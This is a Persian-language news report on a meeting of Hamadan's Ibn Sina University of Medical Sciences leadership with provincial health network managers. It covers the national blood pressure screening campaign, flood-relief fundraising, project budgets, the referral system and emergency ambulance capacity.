برگزاری نشست سرپرست دانشگاه علوم پزشکی ابن سینا با مدیران شبکه های بهداشت و درمان استان

نشست دکتر حیدری مقدم و جمعی از معاونان و مدیران دانشگاه علوم‌پزشکی ابن سینا با مدیران شبکه بهداشت و درمان استان در سالن جلسات مرکز همایشهای دانشگاه برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه به نقل از پایگاه خبری وبدا در همدان سرپرست دانشگاه علوم پزشکی ابن سینا در گردهمایی مدیران شبکه های بهداشت و روسای مراکز بهداشت استان بر تعامل سازنده درون بخشی و برون بخشی در جهت ارتقا سلامت مردم استان تاکید کرد.

دکتر رشید حیدری مقدم با تاکید بر لزوم ایجاد فضای مناسب و فراهم کردن زمینه رشد افراد توانمند برای پذیرش مدیریت  آینده کشور گفت: روراستی در انجام امور که برای مدیران امانتی الهی محسوب میشود از وظایف آنان است.   وی با بیان اینکه برای تمام اتفاقات مورد نیاز دانشگاه منابع وجود دارد، گفت: همه هزینه ها باید برنامه ریزی انجام شود و با رعایت قانون از منابع محدود در جای مناسب استفاده شود.

سرپرست دانشگاه علوم پزشکی ابن سینا با تشکر از همکاران خود در مجموعه معاونت بهداشتی با معرفی دکتر کرمی به عنوان سرپرست معاونت بهداشتی از وی به عنوان فردی آشنا به ساختار بهداشت یاد کرد که تجربه مدیریت در حوزه های مختلف آموزشی و پژوهشی را نیز در کارنامه خود دارد.
دکتر حیدری مقدم اظهار کرد که با برنامه ریزیهای انجام شده پروژه های نیمه کاره بهداشتی تا پایان سال به پایان خواهد رسید.

وی با اشاره یه اینکه پویش ملی همدلی از سوی وزارت بهداشت برای ساخت خانه برای سیل زدگان اعلام شده است گفت: انتظار می‌رود شهرستانهای مختلف استان با جمع آوری مبالغی  برای کاهش آلام سیل زدگان تلاش کنند.

سرپرست دانشگاه علوم پزشکی ابن سینا در خصوص پویش ملی فشار خون بالا نیز گفت: باید تا پایان دو هفته اول بسبج‌ملی پایش فشار خون بالا جمعیت روستایی پوشش داده شوند.

وی خاطر نشان کرد که لازم است برای پوشش پایش فشار خون در شهرستانهای همدان، ملایر و نهاوند برنامه ریزی شود و در صورت نیاز ضمن تامین منابع مالی مورد نیاز از ظرفیت بهورزان نیز استفاده شود.

دکتر حیدری مقدم پایش فشار خون برای کشور را بسیار بااهمیت و در جهان بی نظیر دانست و گفت: تاکنون ۱۷.۳ درصد جمعیت استان و حدود ۱۵۰ هزار نفر در پایش فشار خون بالا پوشش داده شدند.

وی با اشاره به تلاش برای تدوین برنامه جامع سلامت استان گفت: باید دغدغه های مطرح شده در برنامه جامع سلامت استان در شورای برنامه ریزی و در برنامه ریزی های استان استفاده شود.

سرپرست دانشگاه علوم پزشکی ابن سینا خاطر نشان‌کرد که درصد غربالگری فشارخون به ترتیب مربوط به شهرستانهای کبودراهنگ  بهار  فامنین، تویسرکان، رزن، نهاوند، ملایر  همدان بوده است.

دکتر حیدری مقدم تهیه پنل بهداشتی را اقدامی شاخص دانست و گفت: انتظار می‌رود چنانچه این پنل ظرفیت ملی شدن دارد برای این موضوع تلاش شود.

وی با تاکید بر لزوم ثبت اطلاعات درست در پایش فشار خون گفت: اطلاعات به صورت ملی مانیتورینگ می‌شود.

دکترکرمی سرپرست معاونت بهداشتی ضمن قدردانی از اعتماد دکتر حیدری مقدم با ابراز خوشحالی برای خدمت در عرصه بهداشت گفت: دغدغه من در تمام حوزه های خدمتی مقوله بهداشت بوده و از همه مدیران شبکه های بهداشت و درمان و نیروهای ستادی و صف درخواست کمک‌ دارم.

دکتر عطایی نیز با آرزوی موفقیت برای دکتر کرمی گزارش مختصری در زمینه بسیج ملی کنترل فشار خون، انتظارات از مدیران شبکه های بهداشت و درمان را بیان داشت.

وی با اشاره به عملیاتی شدن برنامه پایش فشار خون از ۱۷ خردادماه اظهار کرد: تاکنون ۱۳۳ هزار نفر در سامانه سیب ثبت شده اند و پایش فشار خون ‌برای ۱۷.۳  درصد از جمعیت مورد انتظار انجام شده است. دکتر عطایی یادآور شد که پایش فشار خون ۱۳ هزار و ۸۸۰ نفر در ۱۳۹ ایستگاه کل استان انجام شده است و بر اساس استانداردها وضعیت خوبی وجود دارد.

وی در خصوص شناسایی، درمان و ارجاع از اقدامات دستگاههای همکار ازجمله هلال احمر و شهرداری ها و نظام پزشکی قدردانی کرد و یادآور شد که پایگاه فوریتهای پزشکی در همه شهرستانها انجام‌ وظیفه کردند همچنین همکاری بیمارستانها هم خوب بوده است و فشار خون کل مراجعین مراکز خدماتی و بیمارستانی نیز پایش می‌شود.

وی با تاکید بر برنامه ریزی برای ویزیت بیماران ارجاعی توسط پزشکان گفت: زیرساخت های ارجاع سطح یک به سطح دو  در صورت صلاحدید پزشکان مورد توجه باشد.

مدیریت مناسب برای تامین دستگاه فشار سنج در برخی واحدها،  فعال شدن شیفت های سیار در ساعات بعد از ظهر، در اختیار قراردادن رنکینگ استانی و شهرستانی در حداقل زمان ممکن، مدیریت اطلاع رسانی در شبکه ها از دیگر موارد مطرح شده در جلسه بود.

وی توضیحاتی در مورد پنل مدیریت اطلاعات سلامت معاونت بهداشتی بیان داشت و از ارسال این پنل به همه واحدهای دانشگاه به عنوان چراغ راه برنامه ریزی در شبکه های بهداشت و درمان خبر داد.

دکتر حیدری مقدم همچنین بر لزوم ارتباط مناسب مدیران شبکه های بهداشت و درمان با فرمانداران برای تکمیل پروژه ها تاکید کرد و گفت:  پرونده الکترونیک سلامت و سیستم ارجاع موضوعاتی بسیار مهم هستند و انتظار می‌رود  همه مدیران شبکه ها و مرکز بهداشت و درمان دغدغه های زمین مانده را با هماهنگی دکتر کرمی جمع بندی کنند و بر مبنای آن  منابع تخصیص داده شود.

معاون توسعه مدیریت و منابع دانشگاه علوم پزشکی ابن سینا نیز اظهار کرد: اشراف دکتر حیدری مقدم به حوزه های مختلف دانشگاه و سابقه مدیریتی ایشان در بخش‌های مختلف بسیار بااهمیت و عامل موفقیت هر چه بیشتر دانشگاه خواهد بود.

مهندس رحیمی با ببان اینکه در حوزه مالی و توسعه با همدلی مدیران شبکه وضعیت رو به جلو پیش می رود، گفت: اشتراک‌اطلاعات بر مبنای صداقت منجر به تصمیم گیری درست خواهد شد و با نگاه همه جانبه سال آرامی به پایان برسد.تهیه داروها و ملزومات حیاتی و استراتژیک، کنترل سرمایه های موجود در انبارها با بازدیدهای منظم، توجه به نحوه انعقاد قراردادها و انجام برآوردهای مورد نظر پیش از قراردادها، توجه به سامانه مدیریت انرژی و برخورد با متخلفین، نگاه ویژه به اموال راکد و مازاد، استفاده مجدد و بازیافت وسایل مورد نیاز به سیستم، یکسان سازی انبارها،  بررسی نظام توزیع دارو از دیگر موارد مطرح شده توسط مهندس رحیمی بود.

وی با اشاره به اینکه تا پایان سال ۹۸ بدهی در حوزه پروژه ها وجود ندارد  گفت: همچنان اولویت پروژه های بهداشتی است و همه پروژه های بهداشتی مورد نظر تا پایان امسال تمام‌می‌شود.

مهندس رحیمی با تاکید بر اینکه خارج از جدول زمان بندی هیچ پروژه ای اضافه نمی‌شود اظهار کرد: تمام‌پروژه های شروع شده در دانشگاه در حوزه بهداشتی تا پایان امسال به پایان می‌رسد و هیچ پروژه بدون هویتی در دانشگاه وجود ندارد.

وی خاطر نشان کرد که پرداخت‌های پرسنلی و توجه به زیرساخت‌های مورد نیاز همچون دارو و ملزومات و تکمیل پروژه های بهداشتی همچنان در اولویت نخست دانشگاه قرار دارد.وی جلوگیری از انتقال استرس به مجموعه  با رفتار متعهدانه را از اولویتهای کار معاونت توسعه دانشگاه عنوان کرد و از برگزاری آزمون برای جذب نیروی بهداشتی و درمانی در ماههای آینده خبر داد‌.

توجه به خیرین سلامت و همچنین استفاده از ظرفیت آنان و پیدا کردن راهکاری برای خوداظهاری فشار خون توسط افراد شاغل در حوزه سلامت را پیشنهاد کرد.تجمیع واحدهای اداری مالی در ساختار شبکه های بهداشت و درمان و متمرکز تر دیدن ساختار آنها از دیگر موارد عنوان شده توسط مهندس رحیمی‌ بود.

دکتر جلیلی معاون درمان دانشگاه نیز یکی از سیاست‌های وزارت بهداشت، درمان و آموزش پزشکی را تحول سلامت و پرونده الکترونیک سلامت دانست و اشراف مدیران به سامانه ها را برای مدیریت مناسب منابع مهم دانست.

دکتر جلیلی افزود: با توجه به اینکه همدان جزو دانشگاههای پایلوت در نظام ارجاع محسوب می‌شود و امید می رود مدیران شبکه های بهداشت و درمان با بررسی دستورالعمل‌ها  مسائل را به خوبی مدیریت کنند.

وی نظارت بیشتر در شبکه ها را با انتصاب مدیریت درمان در شبکه ها و تقویت جایگاه کارشناسی نظارت را موضوعی مهم خواند و بر بازدیدهای شبانه از بیمارستان ها تاکید کرد و گفت: جامعه کنونی نیازمند کنار هم قرارگرفتن مسئولان و مردم است.

تلاش برای ماندگاری و افزایش رضایت مندی پزشکان شهرستان، توجه ویژه به بخشهای اورژانس برای رعایت رفتار حرفه ای با بیماران، کنترل تجهیزات اورژانس، حضور دائمی پزشکان و متخصصان، استفاده بهینه از منابع ازجمله در پرداخت کارانه ها و قراردادها، ثبت اطلاعات در سامانه رفاهی، نظارت بر عملکرد پزشکان و برنامه کشیکها در بیمارستانها از موارد تاکید شده توسط دکتر جلیلی بود.

دکتر حبیب معصومی مدیر اورژانس پیش بیمارستانی و مدیریت حوادث دانشگاه نیز اظهار کرد: تا سال ۱۴۰۰ تعداد شش پایگاه باید در استان همدان ایجاد شود که سه پایگاه امسال به بهره برداری می رسد.

دکتر معصومی گزارشی از وضعیت آمبولانسهای استان ارائه کرد و گفت: در مجموع تعداد ۷۰ آمبولانس در استان وجود دارد که ۵۶ آمبولانس جدید است.وجود ۱۱ ساختمان که در حال ساخت در حوزه اورژانس پیش بیمارستانی و اعمال موضوع بهره وری برای تمام کارکنان اورژانس ۱۱۵، لزوم مشخص شدن مواقع استفاده از اورژانس هوایی در قالب تفاهم نامه، استفاده از تب لتهای مسیر یاب، فعال کردن دیسپچ ها و تبدیل هشت مرکز پیام به سه مرکز پیام استفاده از ظرفیت خیرین برای ساخت پایگاه اورژانس هوایی در ۵ کیلومتری همدان، نبود انبارک در فوریتهای پزشکی و دریافت مواد مورد نیاز از شبکه هااز موارد ارائه شده در گزارش دکتر معصومی بود.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *